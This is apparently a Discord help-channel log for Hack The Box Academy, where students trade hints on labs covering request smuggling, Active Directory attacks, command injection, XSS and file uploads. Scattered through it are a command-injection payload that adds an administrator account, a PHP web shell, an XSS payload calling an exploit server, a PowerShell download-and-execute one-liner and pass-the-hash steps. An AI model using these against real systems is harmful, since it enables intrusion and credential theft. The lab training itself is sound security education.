#modules
Lmao
Out of pure curiosity, was your favorite part the connectivity or the modifications to the files?
TE. CL?
anyone feel like assisting? ❤️
i would say modifications wbu
Transfer-Encoding and Content-Length
is this CWEE or--? I don't remember off the top of my head if HTTP Attacks is a standalone module
correct, CWEE
Both
breaths in as if in pain
It was both. 
lmaooo
That's above me, I'm dual-wielding CPTS/CBBH. What's the context?
I've looked at the hint and got the TE.TE part figured out but not sure what else I'm missing.
omg finally passed that section, didn't really understand a lot but what a pain in the ass
At that point I just blatantly lied to myself and said everything is alright. This is good practice. Repetition is good 
Apparently supposed to do a TE.CL exploitation with a TE.TE technique also. Smuggling 3 requests in 2 real sequential requests to bypass a WAF.
Nobody in the public setting around who understands CySec "Right, guys?...Guys?"
LMAOO fr fr
So it's like appending strings in an obfuscated command injection, but HTTP requests? (Don't quote me, but I'll take the correction) @barren torrent
@barren torrent Unsure if this is helpful, but may I dm you a link?
It's from PortSwigger
sure
Sent
I have the HTTP Request Smuggler extension for Burp so throwing that at it now and praying 
😅
Once that works, try it manually after reviewing the plugin functionality perhaps? That would be cool
welp, I quit lol
Module: Attacking Common Applications, Section: Attacking Splunk, Question: I have Splunk Enterprise hosted at port 8000, however it has been loading for 30mins (url: https://target_ip:8000/). Could anyone give me a nudge???
i think it's supposed to be http not https but not sure
give it a try and see if it works
when i put in http, it said The connection was reset
i restarted it already 😦
or do u need to wait for 5 mins for the target to set up HAHA
i tend to wait 5 min just in case
alright ill try it
It is meant to be https btw
Splunk runs on https
Similar to Nessus
why?
MODULE: Whitebox Attacks
SECTION: Skills Assessment
I've elevated my privileges once (from an account with role = 2). Now I'm stumbling about trying to identify the vulnerability to move along again and could use some help. Some general observations:
- The added capability I have now is viewing the `User Management` tab of the app, enabling interactivity with `manage.php`.
- The above permits me to add users of the same privilege and delete whatever account I'm presently signed in as.
- At a glance, I don't think the assessment is looking to perform Type Juggling, as I don't see any loose comparisons being made in `add_user()` or `delete_user()`.
- I think that there might be some kind of TOCTOU vulnerability at play, since there isn't a SQL lock being put in place in the various INSERT/DELETE operations taking place after the call to `fetch_user_data()`. However, I don't see what harm would be taking place; the `$role` being assigned to any created user is fixed as being the same as my present user, so I'm not exactly elevating privileges.
- I entertained the idea of Prototype Pollution maybe being involved (i.e. perhaps there's a way to pollute the `role` value for future accounts to be created as admins), but I didn't see anything suggestive amidst the JavaScript included in the downloaded source code.
I'm well and truly stuck and would welcome a nudge.
You are on the right track, try to identify a race condition and how you could abuse that. You really have to think outside the box.
why?
RDP connection (attack host) doesn't work with the AD module ☹️
I'm connected for 10 seconds, then I'm disconnected
keeps disconnecting and not stable yeah
Is it just me or is nmap really slow?
The more I wait, the more the remaining time increases instead of decreasing
Section: PRTG Network Monitor, Module: Attacking Common Applications. Question: I have created a new user test.txt;net user prtgadm1 Pwn3d_by_PRTG! /add;net localgroup administrators prtgadm1 /add by creating a notification in the PRTG network monitoring and running send a test notification. However, when I run crackmapexec to authenticate against smb with the newly created credentials, I can't seem to log on, need a nudge 🙂
cme tries domain login by default, you made a local account
so how do i use cme to authenticate for local account, is there any flag i have to set?
try --local-auth
Still failed :<
I have been stuck here for quite a few hours, and I did all the steps that were in the notes. I'll appreciate it if anyone could troubleshoot or at least explain where I went wrong
Hello, I am interested in learning hacking, how do I start
make sure the task actually triggered, recheck your steps
Yes, I clicked the Test notification, and they said exe is being queued and no error msg was printed.
do u mind if i pm u the screenshots of the evidences of the task being triggered
you can send screenshots here
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@halcyon dock
Good morning, I am trying to solve the skills assessment of the intro to assembly module... I am stuck since I don't know what I am doing wrong... I have a shellcode from concatenating the info stack from my code but it's a wrong answer...
Has someone finished this module?
It looks like you're stuck on a credential stuffing attempt
Hey guys, for attacking common services easy lab. Can someone clarify why I needed to attach “target username”@inlanefreight@htb and then for initial foothold for the given service the domain didn’t matter?
for a pass the ticket attack using rubeus, is it required to specify a kerberos key to perform the attack? some of the commands use it in the password attacks module in the ptt attack from windows section, and some don't
if you're specifically passing the ticket itself, then you'll need to specify the ticket
either in b64 or the kirbi file
do i also need to specify the key
wdym the key
the user hash i think
no, if you're only passing the ticket, you'll only need to specify the ticket
and to create a ticket, ill need the key?
to receive a ticket from KDC, you'll need valid credentials. over pass the hash is where you exchange NTLM authentication to get a kerberos ticket
I run my binary in gdb, put the breakpoint in the loop and type next until rcx is 1
I get this after info stack
does an ntlm hash for a user count as part of the valid credentials
What should I be doing here? How do I find the total packages?
"How many total packages are installed on the target system?"
someone executed this (website on google) "dpkg -l | grep -c 'ii'"
but why? dpkg isn't even a part of this module
what's the loop count
you can pth for ntlm
some things you'll need to google, the module isn't gonna go through every command ever
can i also use it to get a ticket from the kdc?
hm alright man thank you
7
read the Pass the Key or OverPass the Hash part in Pass the Ticket (PtT) from Windows
is the times I press next until I reach rcx 1
so the hash can be used to forge a kerberos ticket?
no. take a look at the disassembled binary again
you're not forging the ticket, you're asking the KDC for a valid kerberos ticket
so if i have the users ntlm hash, i can use this to ask the kdc for a kerberos ticket, which i can then use in a pass the ticket attack?
yes, that's how OPTH works
well it's not really an attack, it's just different ways to authenticate to AD, NTLM vs kerberos
I'm having a problem cracking the hash in the "kerberos attacks" skills assessment, basically it's the first step. While I can probably use another way to accomplish the task, I'm wondering if the correct wordlist to use is "rockyou.txt". Thanks for any tip.
yes
I got it 🙂 started from scratch...
Question: got access to the smb share in the password attacks module (https://academy.hackthebox.com/module/147/section/1327), but the flag.txt file is empty
I'm accessing as the same user that the share is named for, have read/write permissions to the share, and can get the file off the share onto my host machine. It's listed as 0 bytes both on the share itself and on my attacker machine after downloading it.
Is this a bug or is there something I'm missing?
Hey everyone,
Has anyone done the WhiteBox Attacks module? I did it already, but I am unsure if the way I solved it is the intended way or not. If anyone solved it, could you PM me?
Thanks in advance 🙂
PS. I am talking about the SA in the WhiteBox Attacks 🙂
Easy lab - attacking common services : not easy LOL
Which option needs to be set to execute a command as a different user using the "su" command? (long version of the option)
isnt it "--login"?
i literally tried every option i had
sudo su <different user>
That’s if the user you’re changing from is already in the sudo group
oh i thought from the options given in -h
(module 18 btw)
su -h and read the options
Module numbers mean nothing
It's better to say the module name
will do
We don't know a module's name based on its number, and we can't look it up based on the number either
ah i got you
It just puts in added effort on the part of the person attempting to help
yes and that was shown when you run su -h
oh nvm read it wrong
read it as su -l or something
my bad
better to ask in #homelab-sysadm
This channel is about all the modules in the Academy
If you have no access, read and follow #welcome
Hi, feel free to DM me with your solution 🙂
damn is it only me ?
Potentially yes
hey in the footprinting medium skills assessment, while connecting with the SQL Management Studio it is giving the following error. "TITLE: Connect to Server
Cannot connect to WINMEDIUM.
ADDITIONAL INFORMATION:
Login failed for user 'sa'. (Microsoft SQL Server, Error: 18456)
For help, click: https://docs.microsoft.com/sql/relational-databases/errors-events/mssqlserver-18456-database-engine-error
BUTTONS:
OK
"
it says something like "no pipe at destination"
Open as admin
And yes you do have the creds if you found the important text
yeah i have them
dont have admin access in xrdp
You can gain admin access
As said you do have the creds
i have the sa user creds
Consider reuse
ok lemme see
Thanks
Hey y'all, sorry for cross posting this question but I'm very curious. In the "file upload attack" module, under the whitelist filters section, there is a list of characters you can try to bypass file extension filters.
One of those characters I now know is called a "horizontal ellipsis" … (a single character, not 3 periods)
https://www.compart.com/en/unicode/U+2026.
I can't find anything concrete on how/when/why … could be used in an injection. Does anyone have any examples of this in the wild? I asked our AI overload chatGPT but the response was pretty generic/vague. I have been playing around with it locally on the command line.
Linux is fine with files and folders called …, so I don't think it's applicable there.
Powershell and CMD (using Windows terminal and PowerShell terminal) have trouble rendering it (they render a . in my testing) but if you run ls … it will fail with "cannot find file …" so that seems to be purely a cosmetic/rendering issue.
Does anyone have any pointers to help me get out of this rabbit hole I find myself down?
Probably is a problem with your ISP
Dm if you need still help
Thank you!
hey the SQL Management Studio is still showing login failed. crosschecked password.
Use windows login don't switch the login type
Once you're the right user/logged in as a*
yeah been there, I am just confused about what I am looking for there.
sorry i meant adm*
you need to be logged in as adm* -> run MSSQL as administrator -> click through the database
OR if you know how to query:
log in as adm* -> run mssql as administrator -> click new query -> run the query
note querying and stuff is really not touched on well in this module, it's gone over more in Attacking Common Services
Anyone able to help me out with Broken Authentication - Predictable Reset Token section? i just can't get this thing working no matter what
+/- 1 second (1000ms) UTC
thank you let me try those things then
You have to create a token for every millisecond.
In order not to kill the server, you should stay within the time limit. So +/- 1 second.
This already generates 2000 requests
yeah i see the hint says ms but 2000 requests sounded a little bit too much for me so i didn't really go that route
-1 second, +1 second, current time
-1 second (1000ms)
Event generate token 1ms
+1 second (1000ms)
hello guys.. in the AD attack module I cracked the wley password but hashcat doesn't display it. Do you know why?
--show
nothing
Got it. Thanks to both of you for saving me from a headache!!
Hello, can I use the kali loaded from my usb drive instead of a vm to connect to htb network through the vpn?
You mean instead of the PwnBox?
Yes, you can use your own VM.
For this
If you are using pwnbox then time will be already in UTC
If personal VM then NOT in UTC
Hence process is:
Have the time in UTC, then convert it to EPOCH (a web-based UTC time to EPOCH converter is available on Google)
Start time= EPOCH time in milliseconds -1000
End time= EPOCH time in milliseconds+1000
Now generate the tokens with this range and
Then brute force it
Hope you will get it
They've since resolved it
Ooh ok
I went with the query directly
stuck on enumeration for "Attacking common services - medium lab", any nudges?
Read the synopsis
Where are you stuck
used user.list and pws.list on the ftp service but it doesn't seem to work
did that lol
Scan all ports
yeah i saw the hint for the 6th one and brute forced that, no avail
No need to bruteforce
Yw :)
medium lab was easier than the easy lab... ok
Yeah btw the mail service is like entirely unneeded 
big sad
Having trouble on the Skills Assessment for File Uploads. I can successfully read '/etc/passwd' & 'upload.php' source code. However I get no luck uploading a php shell. Any guidance?
Hey guys! I'm sorry to bother with a trivial error but I'm hard stuck at the XSS Bypass module. I found a few bypasses for XSS (object with base64, iframe with srcdoc HTML encoded) but I can't seem to get any admin callbacks? I read somewhere it's to do with HTML encoding my XSS payload? I'm kinda lost on this one.
XHR request gives me this (on my local machine):
NetworkError: Failed to execute 'send' on 'XMLHttpRequest': Failed to load 'http://vulnerablesite.htb:53486/home.php'.
in the pass the ticket from linux section of password attacks, I can't seem to access \dc01\julio. I'm getting this error:
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information
Ticket expired
Error: Exiting with code 1
ticket expired
Any clues on footprinting skill assessment hard. from where to start?
Scan all ports tcp and udp
curl https://www.inlanefreight.com > htb.txt cat htb.txt | grep "www.inlanefreight.com | tr " " "\n"
When I use this, it puts my shell into input mode. How do I exit out of it without having to close my terminal every time this happens? I've tried (Esc). Also, could you tell me why it does this?
tried running the command on the target host, im getting this error now:
<user>@inlanefreight.htb@linux01:~$ smbclient //172.16.1.5/C$ -k -c ls -no-pass
Kerberos auth with '<user>@INLANEFREIGHT.HTB' (\<user>@inlanefreight.htb) to access '172.16.1.5' not possible
session setup failed: NT_STATUS_ACCESS_DENIED
nvm got it
HTB AD Skill Assessment 2
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
I got a reverse shell on SQL01 and transferred mimikatz. I got the NTLM Admin hash, and I tried to do pth with evil-winrm to MS01. Somehow though it doesn't work. Any ideas?
I tried without single quotes as well*.
winrm is a domain thing, you got the local admin hash
Ouch.
try other creds that you got
anybody know how to get a flag if im in ftp?
yes dump everything
i see flag.txt but when I try to cat it it says invalid command
Invalid command
I am pretty sure you can't cat in ftp, use get and cat it locally.
strange
thanks
This one's worth a try
Ghostery is breaking JavaScript on the Academy site. The menu element for modules and paths doesn't open
yeah that's one of the reasons they tell you to disable adblockers i think
sure but that still shouldnt happen
just disable it for academy
i think you enable it in settings
Could I possibly do a 1 liner in cmd to enable rdp so i can have better view and do other shenanigans straight from the rdp session.
thanks and it worked
yes of course thats a bandaid but it still should be fixed
I got the admin hash I could possibly do pth with rdp?
why do you want rdp? psexec gives you a system shell, you can do whatever you want there
there are several registry keys that could prevent RDP, you can disable them but in my experience the box still doesn't allow you to remote in i think they have additional things in place that stop it.
welp, I gotta smoke that copium then
Not vm, i mean from a live usb stick
i....I don't think I was supposed to dump sam. Could I possibly disable UAC or something or should I continue with smth new?
you def can dump the hives, something is wrong with your smbserver
I saw what it is...it's the name
I messed up the name...
that o O ... bruh
Nevermind, wasn't that
look at your ip, that doesn't look like a vpn tun0 ip to me
is that the parrotbox or something
The 172.16.7.60 can't have outbound connections to any 10.10 --. It can only connect to it's 172.16.X.X
I wanted to dump them on the main box 172.16.7.240 from the 172.16.7.60.
So I can download them from my attack host
Essentially 172....60 -> .240 -> <myKaliHost>
my solution was to simply download with CME
Worked :D
Hey guys I have a question relating to the XSS Bypass module (Advanced XSS and CORS):
So I have a payload in my exploit server which works well and returns data from my exfil server. But:
- When I use the XSS payload `<object data="data:text/html;base64,<Base64 representation of <script src="http://exploitserver.htb/exploit"></script>>">` I get back a response but it is just network errors.
- When I use the XSS payload `<ScRiPt SrC="http://exploitserver.htb/exploit"></ScRiPt>` I get back the correct response with the base64 encoded page admin.php.
My question is why? In both cases my script is executed and calls back to log, but then why the difference?
Literally because of the casing, that's it
In one instance the lowercase is being filtered, the other the casing isn't properly filtered so it goes through
how do I get the password for WORKGROUP?
i can access the SMBshare but I can't get the password
But the casing being blocked would mean my payload would be blocked but it isn't it runs and a call to exploit server is made it's the exploit in the server that is erroring
¯_(ツ)_/¯
You're doing a Null session just hit enter
Alternatively just add -N to your command
-N doesn't prompt for a password
gives me this
10.129.107.57sambashare: Not enough '' characters in service
Usage: smbclient [-?EgqBNPkV] [-?|--help] [--usage] [-M|--message=HOST]
[-I|--ip-address=IP] [-E|--stderr] [-L|--list=HOST]
[-T|--tar=<c|x>IXFvgbNan] [-D|--directory=DIR] [-c|--command=STRING]
[-b|--send-buffer=BYTES] [-t|--timeout=SECONDS] [-p|--port=PORT]
[-g|--grepable] [-q|--quiet] [-B|--browse]
[-d|--debuglevel=DEBUGLEVEL] [--debug-stdout]
[-s|--configfile=CONFIGFILE] [--option=name=value]
[-l|--log-basename=LOGFILEBASE] [--leak-report] [--leak-report-full]
[-R|--name-resolve=NAME-RESOLVE-ORDER]
[-O|--socket-options=SOCKETOPTIONS] [-m|--max-protocol=MAXPROTOCOL]
[-n|--netbiosname=NETBIOSNAME] [--netbios-scope=SCOPE]
[-W|--workgroup=WORKGROUP] [--realm=REALM]
[-U|--user=[DOMAIN/]USERNAME[%PASSWORD]] [-N|--no-pass]
Well because you either need to do \\\\IP\\SHARE or //IP/SHARE
after what?
smbclient -U "" -N //IP/Share
Also your error is just listing all the smbclient options, it's not the error code
sudo smbclient -U \10.129.107.57\sambashare -N //IP/SHARE
do_connect: Connection to IP failed (Error NT_STATUS_NOT_FOUND)
I need to connect to the share and get a flag
Incorrect
That's not the syntax I just showed you
Marcie you have the patience of a saint. lol
Also btw it's reading the \10.129.107.57\sambashare as the username
nvm got it
I suggest also learning what placeholder text is
I use it quite often to generalize syntax, which is what you should do for your notes
-U = user
-N = do not prompt for password
Aka sends the password as ""
yeah now its asking me to find the domain the server belongs to
Not everything will be found with smbclient
Read the section to figure out how to enumerate more info
There's 2 main things you work with
hey what do you do when, while taking notes on a topic, you feel like you're just writing stuff down instead of actually comprehending it
is this normal
What's up y'all, I'm currently in need of some help with this module. I just cannot seem to get the flag. Would anyone mind helping me step by step?
I'm able to ssh into it as user4, and cd into Documents and list flag.txt but I receive 0-30
Yes i go through this all the time. Helps if i re-read my notes a couple times.
I like to take a break, and come back to it. If I still struggle I'll check out a video, or ask GPT to explain it in simpler terms. Sounds like it could be a tad bit of burnout.
probably don't just straight up give the answer or the command to get the answer, you can tell them where to look or the steps to take, it will help them learn instead of handing the answer
isn't that what i did
i pretty clearly said "try taking another look through the finding files and directories, user and group management, and finding and filtering content sections"
and also recommended they look in the documentation for a specific command
doesn't change the answer being right there
you in particular
you in particular constantly grossly misinterpret and/or misread every single thing i say here
every time you say anything to me it's almost always something i said that you dislike and you read over a huge chunk of whatever i say and you just read the parts you don't like
i can think of like three other times where you personally have done this
there i deleted the fucking answer
I would refrain from giving exact file location, the command is enough
I DELETED IT
Also heavy spoiler dude. Don't do that
what gave you the idea that I dislike anything that you said? but alright, I won't reply to you anymore, have a good one
there it's all gone
literally like 10 times today and across three different mediums i've tried to help someone with something and people just get mad at me about it
im sorry and i appreciate your help . sorry i missed your message before deletion could you DM me?
It's not being mad it's literally spoiling, also, my network is being dumb so I didn't see it deleted
Helping to get the answer is one thing but revealing the exact file location and answer is another
The point of the exercise was to find it yourself
Finding a writeup for this particular session is practically non-existent and the HTB forums are horrendous to find writeup or help as i've browsed there for hints at what I can do so that I myself may get the answer myself without spoiling
look through the module
so yes, i believe HTB forum help SHOULD get a hard review and good look at
so again any and all hints are greatly appreciated
It's a recursive get-childitem command
The forum is just a bunch of people asking and getting answers, there's no direct writeups on the forums
Thank @loud dagger
why
You're the one that had the command
yea then people chewed her out for trying to be helpful
but anyway
Thanks for y'all's time
I'm not trying to discourage you from helping, just trying to ask you to be mindful of spoiling direct content ¯_(ツ)_/¯
I.e. giving the command to help find it is ok.
Saying the file location and the contents of it is not. Especially in this instance where they purposely give that user a bunch of empty flag.txt to sift through
Sorry for repeating myself
But don't be discouraged. Your intent was to be helpful.
@next bronze So, I dumped Sam. Got hashes that I already have. I will try everything from the password attacks module and ad enum section. Is it okay if I contact you when I am stuck? I couldn't find anything of use from the Sam,security,system .save
the question is to get admin on ms01 yeah? you would have found creds from a certain svc account
Oh...that. Well I found hashes even from mimikatz.
Yeah
So I didn't need to go that far with the hives.
Iirc mimikatz works similarly depending on the submodule used
I found a writeup in Lao language.
Different ways to prep a potato
So I can't escape the juicy potato..
Boil em, mash em, stick em in a stew
Nah, not a reference to juicy potato
I did the sql01 part.
Just saying many ways to do the same thing
Oh.
yeah, but transferring out the reg hives are also useful, the output from mimi is pretty hard to read tbh
True
try that account then
I just stare at it until it makes sense
I will try to crack the hash first.
And uh..I still don't get.
How could that account work for MS01.
Domain joined accounts are fun
I could try to check setspn.exe -q / to see what kind of acc it is.
Logic says it's for a specific service so my head says it's for a specific host. However you remind me of a thing u said.
Don't make assumptions.
try first, question later. doesn't take much time to probe with netexec
Service accounts are just fancy user accounts
Exhausted, pth is on the way.
is it just me or does htb academy overexplain a lot of things
There's never too much.
i disagree
Eh I'd rather overexplain than underexplain
^
guess i'm just stupid then
Nah
Sometimes, occasionally, things just are explained in a dumb way (or not at all)
So, evil-win didn't accept the mssqlsvc hash for the MS01.
Let see what's that netexec thing.
winrm is not always enabled, generally don't use it to test if it's a valid account
Also I have a question:
I have an answer:
What's the difference between these 2:
Will note that.
I could try with psexec.
yeah even the mimikatz repo gets flagged as that
Occasionally
Sometimes the cert expires and it's funny
Well, I'm glad someone's getting help from here. 🫡
I am too restarted to do this by myself.
I am trying tho!
Haha same here I'm trying
you can just do :ntHash
For Blacklist Filters in the File Upload Attacks module, I get a "File successfully uploaded," then I go to SERVER_IP:PORT/profile_images/shell.ext?cmd=id and I'm getting a 404 error. I'm assuming I'm uploading the file wrong through Burp? I change the filename and contents of the uploaded file to the given: <?php system($_REQUEST['cmd']); ?>
Tried it and encountered a new stop, it requires a pass, I will try to use the -no-pass thingy.
if you still need help with your question, I believe that hints were already given, but look up how to filter files by size with powershell
if you're using pth it wouldn't ask for a pass
This may sound stupid but I ssh as user4 and within terminal do I run ps? If so how would I launch ps ? Or would I use ps from parrot os
Yeah, tried. Didn't work. No shares are writable. I didn't include the domain tho, so I will try that next.
literally just enter powershell in cmd
Alright once I'm in . Now I'll go read as I was told
Also @next bronze appreciate it!
W Xre0us and Marcie.
I am done for today though, tired a bit I will go to sleep and end the SA2 tomorrow. Let's hope the next modules won't be that bad and won't be that long.
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
This executes PSUpload.ps1 right?
it's the equivalent on linux of doing something like
wget http://github/code.sh | sh
correct?
doesn't write anything to disk right?
yeah assuming the script is purely executable code and doesn't write anything to disk
ok thank you.
I then don't understand how this is working:
```powershell
PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
PS C:\htb> Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts
[+] File Uploaded: C:\Windows\System32\drivers\etc\hosts
[+] FileHash: 5E7241D66FD77E9E8EA866B6278B2373
```
i guess my point is what is the point of executing PSUpload first?
the powershell script adds the invoke-fileupload function to your powershell session
look at psupload.ps1 itself
heeeey im gettin somewhere! lol
For some reason in the File Inclusion PHP Wrappers section, the target is showing vulnerable to the expect wrapper, but when running the command it does not give the uid as it does in the example.
I was already able to get the flag with another method in the module, I just wanted to see if anyone can check for me to see if their command works.
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
Here is my command showing it vulnerable
base64config is just a text file containing the output of the config piped to base64 since it was too long and froze my terminal
ahhh that makes sense thank you
Any leads on snmp v3 enumeration? doing footprinting hard assignment
Does anyone know how I can access DC01 on the AD Skills Assessment 1? I have the admin hash, is there an easy way to now access the DC01 machine? Do I need to set up a SOCKS proxy through the machines or is there a better way?
So basically I am on MS01 but I cant find a good way to get onto DC01
@strange forge have you tried community string brute forcing?
```cmd
C:\htb> echo USER anonymous >> ftpcommand.txt
C:\htb> echo binary >> ftpcommand.txt
C:\htb> echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
C:\htb> echo bye >> ftpcommand.txt
C:\htb> ftp -v -n -s:ftpcommand.txt
```
what's the use case for creating a command file.... i understand what is going on
but since we already have the shell why don't we just use ftp interactively
yes i got the community string. not able to figure out next approach
ok did u use the community string?
yes with snmpwalk and braa
a user tom is there
no pass just user. bruteforcing here?
yeah
look again
ohh got it
hello guys how to fix this output
```
┌─[✗]─[htb-student@ea-attack01]─[~]
└──╼ $ kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt

[kerbrute ASCII-art banner]

Version: dev (9cfb81e) - 05/01/24 - Ronnie Flathers @ropnop

2024/05/01 18:30:58 > Using KDC(s):
2024/05/01 18:30:58 > 172.16.5.5:88
2024/05/01 18:30:58 > You must specify a password to spray with, or --user-as-pass
```
it says right there, you need to specify a password to spray with
already spray password
what?
can anybody help with the web api skill assessment?
is EU VPN really slow atm for you guys, too?
I'm on PowerShell, why doesn't the command work? I run `Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid2} -Verbose` but it just gets frozen and doesn't output anything, but I can cancel cmd
for Active Directory Enumeration & Attacks, page 20, ACL Enumeration
ACL Enumeration: just need to rdp into htb only and not connect to the dc, right?
Was the same for me, it may work; I guess because of `Get-DomainObjectACL -Identity *` it queries everything it can find. You could directly specify the group if you know it, e.g. `Get-DomainObjectACL -ResolveGUIDs -Identity "Groupname"`
It also just takes time as each ACE is listed under the ACL listing so it's grabbing a lot of info
exactly 🙂 that was what I was trying to explain
Yep
I wasn't disagreeing I was just expanding that it's a LOT of info depending on how many objects exist
And that it's not freezing, it's just doing its job. If there wasn't the filter there... boy howdy
yeah I run it without the sid filtering and there is a lot of info 😄
ListChildren, GenericWrite, ReadProperty
- 0 What privileges does the user damundsen have over the Help Desk Level 1 group?
tf why
```
AceType : AccessAllowed
ObjectDN : CN=Help Desk Level 1,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
OpaqueLength : 0
ObjectSID : S-1-5-21-3842939050-3880317879-2865463114-4022
InheritanceFlags : ContainerInherit
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-3842939050-3880317879-2865463114-1176
AccessMask : 131132
AuditFlags : None
AceFlags : ContainerInherit
AceQualifier : AccessAllowed
```
why won't it work
you are on the right track, check what you can do with one of the ActiveDirectoryRights you have
Why am i always directed to this channel when I’m looking at other ones
the answer ListChildren, ReadProperty, GenericWrite
Because you're not verified, read and follow #welcome
but it says its not it
It's only one of those
how
what is not?
the 3
As I said it's one of those, perhaps refresh your memory by rereading the section
Only one of them is the answer, the others are rights, not privileges
It's specifically asking, in this instance, what stands out
ListChildren and readproperty just means he can look at them
And generally can't be abused
Does anyone know how to access DC01 on the active directory skills assessment 1. I have the administrator hash and I spawned a new cmd with mimikatz under the context of the administrator user. I have tried to access the DC with Enter-PSSession however I am getting errors and it does not seem to work.
My next strategy is to use chisel so I can run CME or something on my kali machine?
Is there another way to access DC01?
I have not been able to RDP to Windows machines lately. Has anyone encountered the same problem?
Can someone help me? I'm doing Attacking Common Applications, section Exploiting Web Vulnerabilities in Thick-Client Applications. I am following the instructions to exploit, but once I get to the step of having to open the fatty-server.jar it won't transfer to my desktop and outputs this instead
How lately? I connected a few hours ago. Post the command you are using and the error.
here is the part i edited as shown in the instructions just not sure if i need to put the /* */
Hey, how to bruteforce using hydra when https is requiring authentication? I am trying http-post-form but there is no success or failure condition I know
Stuck on "Bypassing Blacklisted Commands". I found the flag file, but the command I'm issuing doesn't return data. I think I fail to understand the significance of the numbers in the bypass. Can someone explain
Why don't you know the failure condition? What happens when you put in the wrong creds?
there is a popup for credentials. As the page loads the popup asks for creds. On entering wrong creds it asks for creds again
Then the failure condition is the popup
¯\_(ツ)_/¯
Or the base page info
I take it you've already done an inspect element to try and look for it
I would probably do something like setting success to 302.
basic auth, hydra can brute force this.
I am forgetting the command
You are trying to use http-post-form when it should be basic auth.
hydra -L user -P pass ip
I can. Best if you can ask your question here, but you can DM if needed.
Add http-get
in the string ${PATH:0:1} I assumed the middle digit was the start of the line and the second is the number of characters that are printed
in practice with the bypass string I issued for the question in Bypassing Blacklisted Commands, it doesn't print anything
despite putting 15 in the second place
Yes, that is right, so $PATH pretty reliably starts with / so starting at the first character 0 and grabbing one character 1 gets you a /
Remember that the $PATH is on the remote machine, so unless you know what the 15th character is, you should find another way.
I guess that's the second piece, what is actually happening
Normally when I see that error I just haven't waited long enough (after starting the machine). But, double-check that you are using the right creds.
I would reset the box. This is the command I use, but shouldn't make a difference: `xfreerdp /dynamic-resolution /cert:ignore /timeout:50000 /compression -themes -wallpaper /network:broadband /v:$ip /u:$user /p:$pass`
Did you get it?
see dm
I'm going crazy -_-
Try with remmina, if the issue persists -- wrong creds
Add /cert:ignore
I mean logon failure means wrong creds
I tried remmina and it worked this time, but I couldn't really RDP for a few days.
Ohh, I use this command, it works: `reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f`
anyone T-T
Try doing type and point it to the file directly 🤷♂️
This is giving a lot of false positives. No network activity while debugging. How do I get either a fail or a success condition?
Try adding /sec:nla to the xfreerdp
Configure the command with either a failure or success condition.
Yeah, I figured that out. There is no network activity when login fails. Any hint what I am looking for?
I would probably try to find something that is on the HTML for the landing page that is likely not on the successful login page (or the other way around).
http basic authentication returns 401 if the credentials are wrong, I've never seen false positives with hydra using basic auth https://developer.mozilla.org/en-US/docs/Web/HTTP/Authentication
That's likely why it wasn't loading, as shown by the section
Guys im doing the AD skills assessment #1
I've cracked the hash of svc_sql, I have a shell on dc01.inlanefreight.local
So I need to auth to mssql on this domain: SQL01.inlanefreight.local
I started by importing powerupsql & ran this to see the instances
Get-SQLInstanceDomain
I saw the instances so I crafted this command to login
`Get-SQLQuery -Verbose -Instance "SQL01.inlanefreight.local,1433" -username "SQL01.inlanefreight\svc_sql" -password "correct_pass" -query 'Select @@version'`
However it just hangs. First I tried it with lowercase sql01, but it's just hanging man, on psexec and a netcat shell.
Well 1433 is the SQL port
doing the attacking common services easy assignment.
But otherwise it could be you're using the wrong syntax
ok, will look at cheatsheet
Yeah you don't need to specify sql01.inlanefreight
for the user correct?
Yes
man this assignment is really ridiculous. bruteforcing for the pass with rockyou is taking ages.
Using rockyou sounds like a bad idea
It's an insanely large list, is there not another provided list?
list given in assignment is not working
Or: your previous attempts were using the wrong failure string
And you discounted it because it was only behaving as intended
attacking common services requires you to brute force http basic auth? You sure you're hitting the right place?
I got a valid user with smtp-user-enum. Tried it on http basic auth, didn't work. Now trying the user on various services: ftp, mysql, rdp
Yeah, it is surely not a good place to start with. This whole assignment is testing my patience, like bruteforcing is gonna work with a real target.
It absolutely does not lol
I don't recall needing to do any http bruteforce with that module
What section?
skill assignment -easy. yeah i figured out http bruteforce is waste.
got an smtp user now trying its pass
lol even the walkthroughs are using rockyou. and mine says it will be completed in 1867 hr.
That's impractical
Oh wait yeah, it's in rockyou
Just checked but it's fairly high on the list
That's for it to run the full list, also iirc you need to use the @domain
Yeah it's within the first 200 fwiw so it's not gonna take the full 1k hours
Can anyone explain the grep -v "<.>" portion of
curl -s -w "\n" 'http://STMIP:STMPO/index.php?language=./profile_images/shell.gif&cmd=ls+/' | grep -v "<.>"
???
It's from the LFI and file uploads section
There's nothing in the man page besides the -v option and all it says is invert
Would you mind if I asked you more about this?
I haven't made forward progression on this yet, but I have an idea about how I might get there. I'd just like to validate assumptions.
it helps if you wrap the command in backticks
also you're sharing from the walk-through
i take it you're trying to say \<.*\>?
basically think what grep -v does, and then apply it to the scenario
you're that far into the course you should understand at bare minimum how grep works, and what special characters are
No, no backticks in the example
Yeah
again if you wrap YOUR command that you're copying in backticks it's easier to see your command formatting
I see what the <.*> is accomplishing i'm just not sure what it's actually doing
otherwise if text has a * at the start and end of a statement *like this* discord formats it like this
